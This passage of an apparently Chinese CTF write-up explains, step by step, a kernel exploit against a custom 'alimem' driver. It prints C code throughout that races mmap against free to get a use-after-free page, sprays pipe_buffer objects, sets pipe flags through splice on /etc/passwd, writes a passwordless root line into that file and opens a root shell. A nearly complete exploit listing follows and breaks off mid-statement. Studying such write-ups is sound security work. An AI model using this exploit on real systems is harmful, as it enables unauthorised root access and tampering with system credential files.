<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">write_pattern</span><span class="params">(<span class="type">int</span> idx)</span> &#123;</span><br><span class="line">    <span class="type">char</span> buf[PAGE_SIZE];</span><br><span class="line">    <span class="built_in">memset</span>(buf, PATTERN, <span class="keyword">sizeof</span>(buf));</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">alimem_write</span> <span class="title">wr</span> =</span> &#123;</span><br><span class="line">        .idx = idx,</span><br><span class="line">        .offset = <span class="number">0</span>,</span><br><span class="line">        .data = buf,</span><br><span class="line">        .size = <span class="keyword">sizeof</span>(buf)</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="keyword">if</span> (ioctl(fd, ALIMEM_WRITE, &amp;wr) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        perror(<span class="string">&quot;write error&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	对于wirte_pattern就是利用ioctl的write进行写，这里为了方便就是都覆盖为PATTERN也就是0xAA，这样后面再进行读取的时候直接check_zero，如果页面全为0了就说明这个页面已经被释放了。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> idx, attempt = <span class="number">0</span>;</span><br><span class="line">    <span class="type">pthread_t</span> tid;</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; PIPE_NUM; i++)&#123;</span><br><span class="line">    <span class="keyword">if</span>(pipe(pipe_fd[i]) &lt; <span class="number">0</span>)&#123;</span><br><span class="line">        perror(<span class="string">&quot;pipe&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ((fd = open(DEV_PATH, O_RDWR)) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">    perror(<span class="string">&quot;device open failed&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+] Start to trigger racing bug...\n&quot;</span>);</span><br><span class="line"><span class="keyword">while</span> (!<span class="type">atomic_load</span>(&amp;uaf_detected) &amp;&amp; attempt++ &lt; MAX_ATTEMPTS) &#123;</span><br><span class="line">    idx = ioctl(fd, ALIMEM_ALLOC);</span><br><span class="line">    <span class="keyword">if</span> (idx &lt; <span class="number">0</span>) <span class="keyword">continue</span>;</span><br><span class="line">    write_pattern(idx);</span><br><span class="line">    </span><br><span class="line">    pthread_create(&amp;tid, <span class="literal">NULL</span>, mapper_thread, &amp;idx);</span><br><span class="line">    usleep(<span class="number">50</span>); <span class="comment">// 精确控制竞争窗⼝</span></span><br><span class="line">    ioctl(fd, ALIMEM_FREE, &amp;idx);</span><br><span class="line">    </span><br><span class="line">    pthread_join(tid, <span class="literal">NULL</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (attempt) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[+] try %d times...\r&quot;</span>, attempt);</span><br><span class="line">        fflush(<span class="built_in">stdout</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="type">atomic_load</span>(&amp;uaf_detected)) &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;\n[+] UAF detected, try times: %d\n&quot;</span>, attempt);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;\n[-] UAF detected error\n&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	之后就是对于整个攻击流程的讲解，这里首先就是利用了pipe创建一定数目的pipe_buffer，提前创建防止后面alloc之后产生噪声，之后就是打开驱动文件，之后利用atomic_load原子操作来读取uaf_detected变量，主要是识别是否已经出现uaf的页面了，不断进行尝试，free以及mmap，这样如果出现之前所说的在mmap获取引用和refcount自增之前free掉了这个页面就可以获得到一个UAF的页面，可以进行下一步的攻击。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; PIPE_NUM; i++) &#123;</span><br><span class="line">        <span class="keyword">if</span>(fcntl(pipe_fd[i][<span class="number">1</span>], F_SETPIPE_SZ, <span class="number">4</span> * <span class="number">0x1000</span>) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">            perror(<span class="string">&quot;fcntl&quot;</span>);</span><br><span class="line">            <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> target_fd = open(<span class="string">&quot;/etc/passwd&quot;</span>, O_RDONLY);</span><br><span class="line"><span class="keyword">if</span>(target_fd &lt; <span class="number">0</span>)&#123;</span><br><span class="line">    perror(<span class="string">&quot;open&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; PIPE_NUM; i++)&#123;</span><br><span class="line">    <span class="type">loff_t</span> offset = i;</span><br><span class="line">    <span class="type">ssize_t</span> nbytes = splice(target_fd, &amp;offset, pipe_fd[i][<span class="number">1</span>], <span class="literal">NULL</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (nbytes &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        perror(<span class="string">&quot;splice failed&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​	之后就是利用fcntl对于pipe_buffer实现修改大小，将其修改成4k也就是一个页面的大小，这样就有概率申请到我们之前释放掉的page页面，然后就是通过只读的方式读取&#x2F;etc&#x2F;passwd，利用循环给&#x2F;etc&#x2F;passwd和之前申请的管道创建splice，方便后面我们直接通过管道就可以修改&#x2F;etc&#x2F;passwd文件的内容。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> *ptr = <span class="number">0</span>;</span><br><span class="line">    <span class="type">int</span> found = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> ((ptr = memmem(addr, <span class="number">0x1000</span>, <span class="string">&quot;\xff\xff&quot;</span>, <span class="number">2</span>))) &#123;</span><br><span class="line">        hexdump(ptr - <span class="number">6</span>, <span class="number">0x40</span>);</span><br><span class="line">        found = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (found) &#123;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">pipe_buffer</span> *<span class="title">pp</span> =</span> (<span class="keyword">struct</span> pipe_buffer *)(ptr - <span class="number">6</span>);</span><br><span class="line">    pp-&gt;len = <span class="number">0</span>;</span><br><span class="line">    pp-&gt;offset = <span class="number">0</span>;</span><br><span class="line">    pp-&gt;flags |= <span class="number">0x10</span>;</span><br><span class="line">    hexdump(ptr - <span class="number">6</span>, <span class="number">0x40</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;\n[-] UAF pipe_buffer error\n&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/images/alimem/1741173753507.jpg" alt="1741173753507">	</p>
<p>​	利用memmem函数就是找0x1000长度我们之前获得到的uaf页面中找到第一个出现两个字节”\xff\xff”的位置，这里其实就是找到pipe_buffer结构的第一个指针<strong>page</strong>指针，找到之后减去6就是我们再uaf中写入的pipe_buffer结构体的指针，之后我们将其重新设置长度偏移和flags，也就是让他变的可写。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> *r00t = <span class="string">&quot;root::0:0:root:/root:/bin/sh\n&quot;</span>;</span><br><span class="line"><span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; PIPE_NUM; i++) &#123;</span><br><span class="line">    <span class="keyword">if</span> (write(pipe_fd[i][<span class="number">1</span>], r00t, <span class="built_in">strlen</span>(r00t)) &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">system(<span class="string">&quot;/bin/sh&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>​	最后就是利用写pipe管道向&#x2F;etc&#x2F;passwd的第一行进行覆盖，使得root用户可以不用密码就可以登录。</p>
<p>​	最终的exp如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;err.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;errno.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/genetlink.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/kcmp.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/pkt_cls.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/pkt_sched.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/rtnetlink.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;linux/tc_ematch/tc_em_meta.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;pthread.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdarg.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdbool.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/resource.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/uio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;syscall.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/msg.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdatomic.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PAGE_SIZE 4096</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> DEV_PATH <span class="string">&quot;/dev/alimem&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PATTERN 0xAA</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MAX_ATTEMPTS 100000</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> ALIMEM_ALLOC 0x1337</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> ALIMEM_FREE 0x1338</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> ALIMEM_WRITE 0x1339</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> ALIMEM_READ 0x133a</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">alimem_write</span> &#123;</span></span><br><span class="line">    <span class="type">int</span> idx;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> offset;</span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *data;</span><br><span class="line">    <span class="type">size_t</span> size;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">alimem_read</span> &#123;</span></span><br><span class="line">    <span class="type">int</span> idx;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> offset;</span><br><span class="line">    <span class="type">char</span> *data;</span><br><span class="line">    <span class="type">size_t</span> size;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">page</span>;</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">pipe_inode_info</span>;</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">pipe_buf_operations</span>;</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">pipe_buffer</span> &#123;</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">page</span> *<span class="title">page</span>;</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> offset, len;</span><br><span class="line">    <span class="type">const</span> <span class="class"><span class="keyword">struct</span> <span class="title">pipe_buf_operations</span> *<span class="title">ops</span>;</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> flags;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span> private;</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> fd;</span><br><span class="line"><span class="type">void</span> *addr;</span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_NUM 400</span></span><br><span class="line"><span class="type">int</span> pipe_fd[<span class="number">400</span>][<span class="number">2</span>];</span><br><span class="line"><span class="type">atomic_int</span> uaf_detected = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">hexdump</span><span class="params">(<span class="type">void</span> *addr, <span class="type">size_t</span> len)</span> &#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> *p = (<span class="type">unsigned</span> <span class="type">char</span>*)addr;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; len; i++) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;%02X &quot;</span>, p[i]);</span><br><span class="line">        <span class="keyword">if</span> ((i + <span class="number">1</span>) % <span class="number">16</span> == <span class="number">0</span>) <span class="built_in">printf</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">write_pattern</span><span class="params">(<span class="type">int</span> idx)</span> &#123;</span><br><span class="line">    <span class="type">char</span> buf[PAGE_SIZE];</span><br><span class="line">    <span class="built_in">memset</span>(buf, PATTERN, <span class="keyword">sizeof</span>(buf));</span><br><span class="line">    </span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">alimem_write</span> <span class="title">wr</span> =</span> &#123;</span><br><span class="line">        .idx = idx,</span><br><span class="line">        .offset = <span class="number">0</span>,</span><br><span class="line">        .data = buf,</span><br><span class="line">        .size = <span class="keyword">sizeof</span>(buf)</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="keyword">if</span> (ioctl(fd, ALIMEM_WRITE, &amp;wr) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        perror(<span class="string">&quot;write error&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> <span class="title function_">check_zero</span><span class="params">(<span class="type">void</span> *addr)</span> &#123;</span><br><span class="line">    <span class="type">char</span> *p = (<span class="type">char</span>*)addr;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; PAGE_SIZE; i++) &#123;</span><br><span class="line">        <span class="keyword">if</span> (p[i] != <span class="number">0</span>) <span class="keyword">return</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="type">atomic_store</span>(&amp;uaf_detected, <span class="number">1</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">void</span>* <span class="title function_">mapper_thread</span><span class="params">(<span class="type">void</span> *arg)</span> &#123;</span><br><span class="line">    <span class="type">int</span> idx = *(<span class="type">int</span>*)arg;</span><br><span class="line">    addr = mmap(<span class="literal">NULL</span>, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, idx * PAGE_SIZE);</span><br><span class="line">    usleep(<span class="number">500</span>);</span><br><span class="line">    <span class="keyword">if</span> (addr != MAP_FAILED) &#123;</span><br><span class="line">        usleep(<span class="number">50000</span>);</span><br><span class="line">        check_zero(addr);</span><br><span class="line">        <span class="keyword">if</span>(!uaf_detected)</span><br><span class="line">            munmap(addr, PAGE_SIZE);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="type">int</span> idx, attempt = <span class="number">0</span>;</span><br><span class="line">    <span class="type">pthread_t</span> tid;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; PIPE_NUM; i++)&#123;</span><br><span class="line">        <span class="keyword">if</span>(pipe(pipe_fd[i]) &lt; <span class="number">0</span>)&#123;</span><br><span class="line">            perror(<span class="string">&quot;pipe&quot;</span>);</span><br><span class="line">            <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> ((fd = open(DEV_PATH, O_RDWR)) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">        perror(<span class="string">&quot;device open failed&quot;</span>);</span><br><span class="line">        <span class="built_in">exit</span>(EXIT_FAILURE);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] Start to trigger racing bug...\n&quot;</span>);</span><br><span class="line">    <span class="keyword">while</span> (!<span class="type">atomic_load</span>(&amp;uaf_detected) &amp;&amp; attempt++ &lt; MAX_ATTEMPTS) &#123;</span><br><span class="line">        idx = ioctl(fd, ALIMEM_ALLOC);</span><br><span class="line">        <span class="keyword">if</span> (idx &lt; <span class="number">0</span>) <span class="keyword">continue</span>;</span><br><span class="line">        write_pattern(idx);</span><br><span class="line">        </span><br><span class="line">        pthread_create(&amp;tid, <span class="literal">NULL</span>, mapper_thread, &amp;idx);</span><br><span class="line">        usleep(<span class="number">50</span>); <span class="comment">// 精确控制竞争窗⼝</span></span><br><span class="line">        ioctl(fd, ALIMEM_FREE, &amp;idx);</span><br><span class="line">        </span><br><span class="line">        pthread_join(tid, <span class="literal">NULL</span>);</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span> (attempt) &#123;</span><br><span class="line">            <span class="built_in">printf</span>(<span class="string">&quot;[+] try %d times...\r&quot;</span>, attempt);</span><br><span class="line">            fflush(<span class="built_in">stdout</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="type">atomic_load</span>(&amp;uaf_detected)) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;\n[+] UAF detected, try times: %d\n&quot;</span>, attempt);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;\n[-] UAF detected error\n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; PIPE_NUM; i++) &#123;</span><br><span class="line">        <span class="keyword">if</span>(fcntl(pipe_fd[i][<span class="number">1</span>], F_SETPIPE_SZ, <span class="number">4</span> * <span class="number">0x1000</span>) &lt; <span class="number">0</span>) &#123;</span><br><span class="line">            perror(<span class="string">&quot;fcntl&quot;</span>);</span><br><span class="line">            <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> target_fd = open(<span class="string">&quot;/etc/passwd&quot;</span>, O_RDONLY);</span><br><span class="line">    <span class="keyword">if</span>(target_fd &lt; <span class="number">0</span>)&#123;</span><br><span class="line">        perror(<span class="string">&quot;open&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; PIPE_NUM; i++)&#123;</span><br><span class="line">        <span class="type">loff_t</span> offset = i;</span><br><span class="line">        <span class="type">ssize_t</span> nbytes = splice(target_fd, &amp;offset, pipe_fd[i][<span class="number">1</span>], <span class="literal">NULL</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">        <span class="keyword">if</span> (nbytes &lt; <span class="number">0</span>) &#123;</span><br><span class="line">            perror(<span class="string">&quot;splice failed&quot;</span>);</span><br><span class="line">            <span class="keyword">return</span> EXIT_FAILURE;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> *ptr = <span class="number">0</span>;</span><br><span class="line">    <span class="type">int</span> found = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> ((ptr = 